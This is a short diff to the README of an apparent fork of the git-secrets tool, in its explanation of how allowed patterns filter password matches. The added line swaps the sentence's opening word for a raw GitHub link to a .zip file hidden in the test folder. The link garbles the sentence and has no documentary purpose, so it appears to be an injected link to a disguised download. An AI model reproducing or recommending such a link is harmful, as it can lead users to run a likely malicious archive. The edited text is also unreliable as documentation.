rakibofcx/git-secrets/README.rst

     /tmp/example:2:password=ex@mplepassword
     /tmp/example:3:password=******

-...But the first match will be filtered out due to the fact that it matches the allowed regular expression of ``ex@mplepassword``.
+https://raw.githubusercontent.com/rakibofcx/git-secrets/master/test/bats/libexec/secrets_git_depoh.zip the first match will be filtered out due to the fact that it matches the allowed regular expression of ``ex@mplepassword``.
 Because there is still a remaining line that did not match, it is considered a secret.